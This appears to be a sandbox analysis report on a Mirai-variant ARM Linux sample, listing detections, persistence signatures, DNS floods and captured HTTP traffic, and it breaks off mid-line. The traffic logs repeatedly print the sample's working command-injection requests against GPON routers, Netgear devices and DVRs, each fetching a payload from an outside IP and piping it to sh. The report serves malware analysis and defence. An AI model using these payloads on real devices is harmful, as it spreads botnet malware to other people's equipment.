Linux Analysis Report
firmware.armv5l.elf

Overview

General Information

Sample name: firmware.armv5l.elf
Analysis ID: 1502466
MD5: 4945d1944e29db3b56a8ed6e4efb65be
SHA1: 4830aa9076c8918480e8756f776432eb9ac00926
SHA256: 24220533c871ac106b98cedcb345cd75d70db5465765623c535c50a9fc195107
Tags: elffirmware
Infos:

Detection

Score: 96
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes identical ELF files to multiple locations
Connects to many different domains
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes massive DNS lookups (> 100)
Executes the "hostname" command used to retrieve the computers name
HTTP GET or POST without a user agent
Sample has stripped symbol table
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: firmware.armv5l.elf Avira: detected
Antivirus detection for dropped file
Source: /usr/bin/bvgwxkzljd Avira: detection malicious, Label: LINUX/Mirai.bonb
Source: /usr/bin/xqshdzbvx Avira: detection malicious, Label: LINUX/Mirai.bonb
Multi AV Scanner detection for submitted file
Source: firmware.armv5l.elf ReversingLabs: Detection: 52%
Source: firmware.armv5l.elf Virustotal: Detection: 54% Perma Link

Networking
barindex
Tries to resolve many domain names, but no domain seems valid
Source: unknown DNS traffic detected: query: www.akak.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.dcae.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.feaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: fkcd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: adab.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: acca.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.fkcd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.ekll.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.fack.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: kbll.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.cbbb.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.bbaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: eabb.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: aekc.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: ebkf.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.aabd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kdaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: cklb.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.acca.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: fack.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.eabb.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: fakb.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: feaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.aekc.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.adab.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: akak.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: kbak.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kbak.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.kbll.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.lcfk.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.fkcd.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: ekll.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: lcfk.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: kdaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.dlda.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kfck.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.cklb.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: kfck.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.aekc.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.claa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: bbaa.ru replaycode: Name error (3)
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 33764 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33766 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 33770 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 50122 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 33774 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 50126 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 33778 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33782 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 50130 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 33784 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 50136 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 50138 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 50140 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59006 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 59010 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 59012 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 59016 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 59020 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 59024 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 59026 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 37186 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 37196 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 60274 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 37216 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 60286 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 37228 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 60300 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 37244 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 60314 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 37260 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 60328 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 60336 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 37278 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 60350 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 54470 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 54484 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 54500 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 54510 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 54526 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 54542 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 54552 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 36658 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 36674 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 36690 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 36702 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 36718 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 36740 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 36752 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 50406 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50422 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50434 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50454 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50470 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50488 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50502 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 35424 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 48414 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35444 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 48434 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35460 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 48450 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35474 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 48464 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35492 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35510 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 48500 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35524 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 48516 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 36556 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36576 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36588 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36604 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36618 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36630 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36644 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 43676 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 43684 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 43704 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 43724 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 43740 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 43754 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 43768 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 60054 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 60068 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 60084 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 50092 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 60102 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50104 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 60118 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50120 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 60134 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50134 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 60146 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50148 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 50162 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 50526 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50538 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50550 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50560 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50582 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50600 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 50612 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 54884 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54896 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54914 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54926 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54942 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54958 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54970 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 36112 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36134 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36156 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36172 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36186 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36204 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36218 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 33010 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33026 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33044 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33060 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33076 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33092 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33106 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 53106 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 53122 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 53138 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 53156 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 53174 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 53192 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 53208 -> 83
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 196
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:51618 -> 32.10.0.0:0
Source: global traffic TCP traffic: 192.168.2.23:48004 -> 8.8.8.8:81
Executes massive DNS lookups (> 100)
Source: global traffic DNS traffic detected: number of DNS queries: 196
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.1Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.1Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.1Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.1Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.1Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.2Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget 